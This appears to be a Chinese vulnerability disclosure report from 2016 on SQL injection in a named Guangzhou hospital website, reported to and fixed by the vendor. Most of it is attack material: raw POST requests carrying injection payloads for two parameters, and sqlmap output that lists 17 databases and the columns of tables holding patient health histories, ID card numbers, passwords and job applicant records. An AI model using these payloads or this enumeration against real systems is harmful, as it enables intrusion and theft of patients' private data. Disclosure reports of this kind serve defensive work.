2016-05-23: 细节已通知厂商并且等待厂商处理中 2016-05-24: 厂商已经确认,细节仅向厂商公开 2016-05-24: 厂商已经修复漏洞并主动公开,细节向公众公开
广州医科大学某附属医院存在SQL注入漏洞 17库
1.参数:tst&txtSCode
http://www.gy3y.com:80/API/TipHandler.ashx (POST)fn=getresult&txtEmail=sample@email.tst&txtSCode=-1*
POST /API/TipHandler.ashx HTTP/1.1Content-Length: 116Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.gy3y.com/Cookie: ASP.NET_SessionId=t4kpl01delq4mjcq3qsdki1r; v="2016052210011700077312700181007386|::"; opxPID=2016052210011700077312700181007386; u=1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|; JSESSIONID=9E1564ED74AE9583CEBA0E891D5E9E62Host: www.gy3y.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*fn=getresult&txtEmail=sample%40email.tst&txtSCode=-1'%20OR%203*2*1%3d6%20AND%20000739%3d000739%20or%20'bjQoX1tH'%3d'
验证:
sqlmap identified the following injection point(s) with a total of 207 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008
--current-user
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current user: 'gy3y_new'
--current-db
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current database: 'gy3y'
--dbs
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [17]:[*] by_gtmi[*] by_gy3y_dnk[*] by_gy3y_nkjy[*] by_gy3y_partyschool[*] exam_F[*] exam_gys[*] gdlisxp[*] gy3y[*] gy3y_gdklmod[*] gy3y_young[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] ScienResearch[*] tempdb
--columns
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' AND 1699=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1699=1699) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(113)))-- vVSP Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: fn=getresult&txtEmail=sample@email.tst&txtSCode=-1' OR 3443=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)-- QFft---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: gy3yTable: vW_AURoleGroup[7 columns]+-------------+---------+| Column | Type |+-------------+---------+| GroupID | int || GroupName | varchar || RoleGroupID | int || RoleID | int || RoleName | varchar || SystemID | int || SystemName | varchar |+-------------+---------+Database: gy3yTable: vW_Action_log[11 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| ActionContentID | int || ActionID | int || ActionSystemID | int || ActionTable | varchar || ActionTime | datetime || ActionType | varchar || ActorAccount | varchar || ActorID | int || ActorName | varchar || Remark | varchar || SystemName | varchar |+-----------------+----------+Database: gy3yTable: DRScheduleLog[6 columns]+-------------+----------+| Column | Type |+-------------+----------+| DeptID | int || DoctorID | int || SchID | int || TimeMark | int || WorkDate | datetime || WrokStateid | int |+-------------+----------+Database: gy3yTable: vW_Member[17 columns]+---------------+----------+| Column | Type |+---------------+----------+| Address | nvarchar || Birthday | datetime || CardID | nvarchar || CreateDate | datetime || Detail | nvarchar || Email | nvarchar || HealCardNum | nvarchar || HealthHistory | nvarchar || Integral | int || NickName | nvarchar || Pid | int || PIID | int || RealName | nvarchar || Sex | int || Stateid | int || TelNum | nvarchar || Type | int |+---------------+----------+Database: gy3yTable: CMSJob[8 columns]+----------------+---------------+| Column | Type |+----------------+---------------+| ArticleID | int || DeptName | nvarchar || Expand | nvarchar || ExpirationDate | smalldatetime || HowMany | int || JobName | nvarchar || Location | nvarchar || Needs | nvarchar |+----------------+---------------+Database: gy3yTable: CMSCode[11 columns]+-------------+----------+| Column | Type |+-------------+----------+| ClassID | int || CodeName | nvarchar || CreatedBy | int || CreatedDate | datetime || Description | nvarchar || EditType | int || HtmlCode | nvarchar || ID | int || ModifedDate | datetime || ModifyBy | int || StateID | int |+-------------+----------+Database: gy3yTable: ResearchAnswer[5 columns]+--------------+----------+| Column | Type |+--------------+----------+| Answer | nvarchar || CreationDate | datetime || Id | int || Ip | nvarchar || QuestionId | int |+--------------+----------+Database: gy3yTable: vW_UserGroupAtomSystem[2 columns]+----------+------+| Column | Type |+----------+------+| SystemID | int || UserID | int |+----------+------+Database: gy3yTable: AUUser[6 columns]+-------------+---------+| Column | Type |+-------------+---------+| Description | varchar || Status | bit || UserAccount | varchar || UserID | int || UserKey | varchar || UserName | varchar |+-------------+---------+Database: gy3yTable: Job[14 columns]+----------------+---------------+| Column | Type |+----------------+---------------+| CreatedBy | int || CreatedDate | datetime || Expand | nvarchar || ExpirationDate | smalldatetime || HowMany | int || ID | int || JobName | nvarchar || Location | nvarchar || ModifedBy | int || ModifedDate | datetime || Needs | nvarchar || OrderNum | int || PublishDate | datetime || Stateid | int |+----------------+---------------+Database: gy3yTable: DRRegisterData[15 columns]+----------------+----------+| Column | Type |+----------------+----------+| CardID | nvarchar || CardNum | nvarchar || CreateDate | datetime || Dept | nvarchar || DeptID | int || Detail | nvarchar || DoctorID | int || DoctorName | nvarchar || DRRegisterId | int || HISRegID | nvarchar || PIID | int || RegName | nvarchar || StateID | int || TelNum | nvarchar || TreatmenteDate | nvarchar |+----------------+----------+Database: gy3yTable: AURoleGroup[3 columns]+-------------+------+| Column | Type |+-------------+------+| GroupID | int || RoleGroupID | int || RoleID | int |+-------------+------+Database: gy3yTable: CMSTemplate[9 columns]+-------------+----------+| Column | Type |+-------------+----------+| CreatedBy | int || CreatedDate | datetime || FullPath | nvarchar || Html | nvarchar || ID | int || ModifedDate | datetime || ModifyBy | int || Name | nvarchar || Stateid | int |+-------------+----------+Database: gy3yTable: AUGroupUser[3 columns]+-------------+------+| Column | Type |+-------------+------+| GroupID | int || GroupUserID | int || UserID | int |+-------------+------+Database: gy3yTable: Searchs[11 columns]+------------+----------+| Column | Type |+------------+----------+| CreateTime | datetime || Deleted | bit || ESID | varchar || ID | bigint || SAbstract | nvarchar || SContent | nvarchar || SID | bigint || SKeyword | nvarchar || STableName | varchar || STitle | nvarchar || SWeight | int |+------------+----------+Database: gy3yTable: AskAdditional[9 columns]+--------------+----------+| Column | Type |+--------------+----------+| Answer | nvarchar || AnswerBy | int || AnswerByType | int || AnswerTime | datetime || AskTime | datetime || ID | int || Question | nvarchar || QuestionID | int || Stateid | int |+--------------+----------+Database: gy3yTable: AUSystem[3 columns]+------------+---------+| Column | Type |+------------+---------+| IsValid | bit || SystemID | int || SystemName | varchar |+------------+---------+Database: gy3yTable: AUAtomRight[4 columns]+---------------+---------+| Column | Type |+---------------+---------+| AtomRightID | int || AtomRightName | varchar || ControlID | varchar || RightPageID | int |+---------------+---------+Database: gy3yTable: Passport[18 columns]+-------------+----------+| Column | Type |+-------------+----------+| CreateDate | datetime || Email | nvarchar || ExpiresTime | datetime || Face | nvarchar || Integral | int || Jk39PID | int || LastIP | varchar || NickName | nvarchar || Password | nvarchar || PID | int || RealName | nvarchar || Security | varchar || Stateid | int || TargetID | int || TelNum | nvarchar || Type | int || UserName | nvarchar || Verify | bigint |+-------------+----------+Database: gy3yTable: AUGroup[3 columns]+-------------+---------+| Column | Type |+-------------+---------+| Description | varchar || GroupID | int || GroupName | varchar |+-------------+---------+Database: gy3yTable: VLog[6 columns]+------------+----------+| Column | Type |+------------+----------+| AccessTime | datetime || IncraseID | int || Remark | varchar || UserID | int || UserName | varchar || VerifyCode | varchar |+------------+----------+Database: gy3yTable: Login_Log[5 columns]+-----------+----------+| Column | Type |+-----------+----------+| IP | varchar || LoginID | int || LoginTime | datetime || SystemID | int || UserID | int |+-----------+----------+Database: gy3yTable: AUAtomRightGroup[3 columns]+------------------+------+| Column | Type |+------------------+------+| AtomRightGroupID | int || AtomRightID | int || GroupID | int |+------------------+------+Database: gy3yTable: vW_UserGroupRoleAtomSystem[2 columns]+----------+------+| Column | Type |+----------+------+| SystemID | int || UserID | int |+----------+------+Database: gy3yTable: CMSRecommend[12 columns]+--------------+----------+| Column | Type |+--------------+----------+| ClassID | int || Config | nvarchar || CreateBy | int || CreateDate | datetime || Detail | nvarchar || ID | int || ModefiedBy | int || ModefiedDate | datetime || OrderNum | int || RName | nvarchar || Stateid | int || Type | int |+--------------+----------+Database: gy3yTable: AskAnswers[12 columns]+---------------+----------+| Column | Type |+---------------+----------+| Answer | nvarchar || AnswerType | int || CreatedBy | int || CreatedByType | int || CreatedDate | datetime || Detail | nvarchar || ID | int || ModifedDate | datetime || QuestionID | int || Stateid | int || Tag | nvarchar || Useful | int |+---------------+----------+Database: gy3yTable: ConfigData[3 columns]+------------+----------+| Column | Type |+------------+----------+| ConfigID | int || ConfigName | nvarchar || ConfigXml | xml |+------------+----------+Database: gy3yTable: DRSchedule[10 columns]+-------------+----------+| Column | Type |+-------------+----------+| CreateBy | int || CreatedDate | datetime || DepID | int || DeptTitle | varchar || DoctorID | int || ID | int || ModifedDate | datetime || ModifyBy | int || ScheduleSet | nvarchar || StateID | int |+-------------+----------+Database: gy3yTable: AURightPage[5 columns]+----------------+---------+| Column | Type |+----------------+---------+| PageCategoryID | int || PageName | varchar || PagePath | varchar || RightPageID | int || SystemID | int |+----------------+---------+Database: gy3yTable: vW_UserAtomSystem[2 columns]+----------+------+| Column | Type |+----------+------+| SystemID | int || UserID | int |+----------+------+Database: gy3yTable: AURole[3 columns]+----------+---------+| Column | Type |+----------+---------+| RoleID | int || RoleName | varchar || SystemID | int |+----------+---------+Database: gy3yTable: Action_Log[8 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| ActionContentID | int || ActionID | int || ActionSystemID | int || ActionTable | varchar || ActionTime | datetime || ActionType | varchar || ActorID | int || Remark | varchar |+-----------------+----------+Database: gy3yTable: AskQuestion[14 columns]+--------------+----------+| Column | Type |+--------------+----------+| AskTo | int || AskToType | int || CreatedBy | int || CreatedTime | datetime || Detail | nvarchar || ID | int || ModifedBy | int || ModifedDate | datetime || Question | nvarchar || QuestionType | int || Stateid | int || Tag | nvarchar || Title | nvarchar || ViewCount | int |+--------------+----------+Database: gy3yTable: vW_UserSystem[2 columns]+----------+------+| Column | Type |+----------+------+| SystemID | int || UserID | int |+----------+------+Database: gy3yTable: vW_SystemUser[7 columns]+-------------+---------+| Column | Type |+-------------+---------+| Description | varchar || Status | bit || SystemID | int || UserAccount | varchar || UserID | int || UserKey | varchar || UserName | varchar |+-------------+---------+Database: gy3yTable: DRDepartments[13 columns]+--------------+----------+| Column | Type |+--------------+----------+| CreateBy | int || CreatedDate | datetime || DepID | int || Detail | nvarchar || ModifedDate | datetime || ModifyBy | int || Name | nvarchar || OrderNum | int || ParentID | int || StateID | int || Tag | nvarchar || UnID | nvarchar || UnionClassID | int |+--------------+----------+Database: gy3yTable: DRRegisterLog[12 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| CreateDate | datetime || Detail | nvarchar || DRRegisterId | int || ID | int || IP | nchar || LogMsg | nvarchar || OperationalType | int || OperatorID | int || OperatorName | nvarchar || OperatorType | int || StateID | int || XForward | nvarchar |+-----------------+----------+Database: gy3yTable: HistoryData[8 columns]+-------------+----------+| Column | Type |+-------------+----------+| Content | nvarchar || CreatedBy | int || CreatedDate | datetime || FieldName | nvarchar || HistoryID | int || MD5 | nchar || PK | int || TableName | nvarchar |+-------------+----------+Database: gy3yTable: DRDoctor[18 columns]+---------------+----------+| Column | Type |+---------------+----------+| BeGoodAt | nvarchar || CreateBy | int || CreatedDate | datetime || DeptID | int || Detail | nvarchar || DoctorID | int || Edu | int || ModifedDate | datetime || ModifyBy | int || Name | nvarchar || NameMore | nvarchar || OrderNum | int || Sex | int || StateID | int || Tag | nvarchar || ThumbImageURL | varchar || Title | varchar || UnID | nvarchar |+---------------+----------+Database: gy3yTable: RecycleResearchAnswer[5 columns]+--------------+----------+| Column | Type |+--------------+----------+| Answer | nvarchar || CreationDate | datetime || Id | int || Ip | nvarchar || QuestionId | int |+--------------+----------+Database: gy3yTable: vW_AUAtomRightGroup[7 columns]+------------------+---------+| Column | Type |+------------------+---------+| AtomRightGroupID | int || AtomRightID | int || AtomRightName | varchar || GroupID | int || GroupName | varchar || PageName | varchar || PagePath | varchar |+------------------+---------+Database: gy3yTable: AUMenu[7 columns]+-------------+---------+| Column | Type |+-------------+---------+| MenuID | int || MenuName | varchar || MenuPath | varchar || OrderNum | int || ParentID | int || RightPageID | int || SystemID | int |+-------------+---------+Database: gy3yTable: vW_AURole[4 columns]+------------+---------+| Column | Type |+------------+---------+| RoleID | int || RoleName | varchar || SystemID | int || SystemName | varchar |+------------+---------+Database: gy3yTable: ResearchQuestion[12 columns]+--------------+----------+| Column | Type |+--------------+----------+| AnswerCount | int || ArticleId | int || CreatedBy | int || CreatedDate | datetime || Id | int || ModifiedDate | datetime || ModifyBy | int || Options | nvarchar || Order | int || QuestionType | int || Required | bit || Title | nvarchar |+--------------+----------+Database: gy3yTable: AUPageCategory[5 columns]+----------------+---------+| Column | Type |+----------------+---------+| CategoryName | varchar || OrderNum | int || PageCategoryID | int || ParentID | int || SystemID | int |+----------------+---------+Database: gy3yTable: TipOffAdd[8 columns]+-------------+----------+| Column | Type |+-------------+----------+| CreatedDate | datetime || ID | int || Question | nvarchar || ReplyBy | int || ReplyDate | datetime || ReplyTxt | nvarchar || StateId | int || TipOffID | int |+-------------+----------+Database: gy3yTable: vW_AURoleUser[9 columns]+-------------+---------+| Column | Type |+-------------+---------+| RoleID | int || RoleName | varchar || RoleUserID | int || Status | bit || SystemID | int || SystemName | varchar || UserAccount | varchar || UserID | int || UserName | varchar |+-------------+---------+Database: gy3yTable: AURoleUser[3 columns]+------------+------+| Column | Type |+------------+------+| RoleID | int || RoleUserID | int || UserID | int |+------------+------+Database: gy3yTable: CMSPicture[13 columns]+--------------+----------+| Column | Type |+--------------+----------+| ArticleID | int || CreatedBy | int || CreatedDate | datetime || Description | nvarchar || IsCover | bit || ModifiedDate | datetime || ModifyBy | int || OrderNum | int || OrgImgUrl | varchar || PictureID | int || StateID | smallint || ThumbImgInfo | varchar || Title | nvarchar |+--------------+----------+Database: gy3yTable: AUClassRight[4 columns]+---------+------+| Column | Type |+---------+------+| ClassID | int || ID | int || ObjID | int || ObjType | int |+---------+------+Database: gy3yTable: vW_AUAtomRightRole[7 columns]+-----------------+---------+| Column | Type |+-----------------+---------+| AtomRightID | int || AtomRightName | varchar || AtomRightRoleID | int || PageName | varchar || PagePath | varchar || RoleID | int || RoleName | varchar |+-----------------+---------+Database: gy3yTable: CMSCLass[20 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| ArticlePath | varchar || ArticleTemplate | int || ArticleTypes | varchar || ArticleUrlType | int || ClassName | nvarchar || ClassType | int || CreatedBy | int || CreatedDate | datetime || Description | nvarchar || FilePath | nvarchar || ForumUrl | varchar || ID | int || KeyWord | nvarchar || ModifedDate | datetime || ModifyBy | int || OrderNum | int || ParentID | int || SName | nvarchar || Stateid | smallint || Title | nvarchar |+-----------------+----------+Database: gy3yTable: CMSRecommedArticles[12 columns]+--------------+----------+| Column | Type |+--------------+----------+| ArticleID | int || CreatedBy | int || CreatedDate | datetime || Detail | nvarchar || ID | int || LinkUrl | nvarchar || ModefiedBy | int || ModefiedDate | datetime || OrderNum | int || PublishDate | datetime || RecommendID | int || Title | nvarchar |+--------------+----------+Database: gy3yTable: TipOff[13 columns]+------------------+----------+| Column | Type |+------------------+----------+| BeInformer | nvarchar || BeInformerDetail | nvarchar || CreatedDate | datetime || Email | nvarchar || ID | int || Informer | nvarchar || InformerDetail | nvarchar || ReplyBy | int || ReplyDate | datetime || ReplyTxt | nvarchar || SecurityCode | varchar || StateId | int || TelNum | nvarchar |+------------------+----------+Database: gy3yTable: PatientInfo[12 columns]+---------------+----------+| Column | Type |+---------------+----------+| Address | nvarchar || Birthday | datetime || CardID | nvarchar || CreateDate | datetime || Detail | nvarchar || HealCardNum | nvarchar || HealthHistory | nvarchar || Pid | int || PIID | int || RealName | nvarchar || Sex | int || TelNum | nvarchar |+---------------+----------+Database: gy3yTable: CMSArticle[25 columns]+------------------+----------+| Column | Type |+------------------+----------+| Abstract | nvarchar || ArticleID | int || ArticleType | smallint || ArticleUrl | nvarchar || Attribute | int || Author | nvarchar || ClassID | int || ControlledStyle | nvarchar || ControlledTitle | nvarchar || CreatedBy | int || CreatedDate | datetime || KeyWord | nvarchar || ModifedDate | datetime || ModifyBy | int || OrderNum | int || PublisDate | datetime || Source | nvarchar || SourceUrl | nvarchar || StateID | smallint || SubTitle | nvarchar || TemplateFilePath | nvarchar || ThumbImageURL | varchar || Title | nvarchar || TitleStyle | nvarchar || ViewCount | int |+------------------+----------+Database: gy3yTable: AUAtomRightRole[3 columns]+-----------------+------+| Column | Type |+-----------------+------+| AtomRightID | int || AtomRightRoleID | int || RoleID | int |+-----------------+------+Database: gy3yTable: CMSArticleDetail_20140704[2 columns]+-----------+----------+| Column | Type |+-----------+----------+| ArticleID | int || Content | nvarchar |+-----------+----------+Database: gy3yTable: JobResumes[49 columns]+-----------------------------+----------+| Column | Type |+-----------------------------+----------+| Address | nvarchar || AwardPunitive | nvarchar || Birthday | datetime || CardID | nvarchar || ComputerLevel | nvarchar || CreatedDate | datetime || Edu | nvarchar || EduExperiences | nvarchar || EduLength | nvarchar || Edulevel | nvarchar || EduSpecialty | nvarchar || Email | nvarchar || Family | nvarchar || Fertility | nvarchar || ForeignLanguageLevel | nvarchar || FORWARDED | nvarchar || Height | int || Hometown | nvarchar || ID | int || JobID | int || JoinPartyDate | datetime || LearnForm | nvarchar || MaritalStateid | nvarchar || Name | nvarchar || Nation | nvarchar || Other | nvarchar || Partisan | nvarchar || Photo | nvarchar || PoliticalStateid | nvarchar || RecruitmentWay | nvarchar || RegisteredAddress | nvarchar || Remote | nvarchar || Research | nvarchar || School | nvarchar || Sex | int || Specialty | nvarchar || Stateid | int || TechnicalQualifications | nvarchar || TechnicalQualificationsDate | datetime || Tel | nvarchar || Tel2 | nvarchar || TemplateFilePath | nvarchar || Training | nvarchar || WorkExperience | nvarchar || WorkExperiences | nvarchar || WorkReason | nvarchar || WorkRelatives | nvarchar || WorkStateid | nvarchar || WorkUnit | nvarchar |+-----------------------------+----------+Database: gy3yTable: vW_AUGroupUser[7 columns]+-------------+---------+| Column | Type |+-------------+---------+| GroupID | int || GroupName | varchar || GroupUserID | int || Status | bit || UserAccount | varchar || UserID | int || UserName | varchar |+-------------+---------+Database: gy3yTable: AUAtomRightUser[3 columns]+-----------------+------+| Column | Type |+-----------------+------+| AtomRightID | int || AtomRightUserID | int || UserID | int |+-----------------+------+Database: gy3yTable: CMSArticleDetail[2 columns]+-----------+----------+| Column | Type |+-----------+----------+| ArticleID | int || Content | nvarchar |+-----------+----------+Database: gy3yTable: UpFile[9 columns]+--------------+----------+| Column | Type |+--------------+----------+| CreateBy | int || CreateDate | datetime || FileFullPath | nvarchar || FileType | int || id | int || Info | nvarchar || MD5 | char || Stateid | smallint || Url | nvarchar |+--------------+----------+Database: gy3yTable: CMSArticleHistory[7 columns]+-------------+----------+| Column | Type |+-------------+----------+| Content | nvarchar || CreatedBy | int || CreatedDate | datetime || FieldName | nvarchar || HistoryID | int || PK | int || TableName | nvarchar |+-------------+----------+Database: gy3yTable: vW_UserRoleSystem[2 columns]+----------+------+| Column | Type |+----------+------+| SystemID | int || UserID | int |+----------+------+Database: gy3yTable: vW_AUAtomRightUser[9 columns]+-----------------+---------+| Column | Type |+-----------------+---------+| AtomRightID | int || AtomRightName | varchar || AtomRightUserID | int || PageName | varchar || PagePath | varchar || Status | bit || UserAccount | varchar || UserID | int || UserName | varchar |+-----------------+---------+
2.参数:CardID
POST /api/post.aspx?callback=parent.SaveCallback&fn=jobResume HTTP/1.1Content-Length: 907Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.gy3y.com/Cookie: ASP.NET_SessionId=t4kpl01delq4mjcq3qsdki1r; v="2016052210011700077312700181007386|::"; opxPID=2016052210011700077312700181007386; u=1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|1463882477773|; JSESSIONID=9E1564ED74AE9583CEBA0E891D5E9E62Host: www.gy3y.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*BirthdayDay=1&BirthdayYear=01/01/1967&CardID=lI1a0BjE';%20waitfor%20delay%20'0:0:0'%20--%20&child=%e5%ad%90&City=&ComputerLevel=Acunetix&Edu=1&EduLength=1&Edulevel=1&Edus=1&EduSpecialtys=1&EduStartEndDates=01/01/1967&Email=sample%40email.tst&FamilyName=nmiirptj&FamilyPosition=1&FamilyRelation=%e7%88%b6&FamilyUnit=1&Fertility=%e6%9c%aa%e8%82%b2&ForeignLanguageLevel=english&Height=1&JobID=103566&JoinPartyDate=01/01/1967&LearnForm=%e5%85%a8%e6%97%a5%e5%88%b6&MaritalStateid=%e6%9c%aa%e5%a9%9a&Name=nmiirptj&Nation=1&Other=1&Partisan=1&Photo=&PoliticalStateid=%e6%97%a0&Province=&rdoCouple=%e5%a4%ab&RecruitmentWay=1&RegisteredAddress=3137%20Laguna%20Street&Research=&School=1&Schools=1&Sex=%e7%94%b7&siblings1=&siblings2=&siblings3=&Specialty=1&TechnicalQualifications=1&Tel=555-666-0606&TemplateFilePath=&Training=1&txtfile=&WorkJobs=1&WorkReason=1&WorkRelatives=1&WorkStartEndDates=01/01/1967&WorkUnits=1
修复注入漏洞
危害等级:高
漏洞Rank:20
确认时间:2016-05-24 08:06
感谢!
2016-05-24:开发商成已经修复。
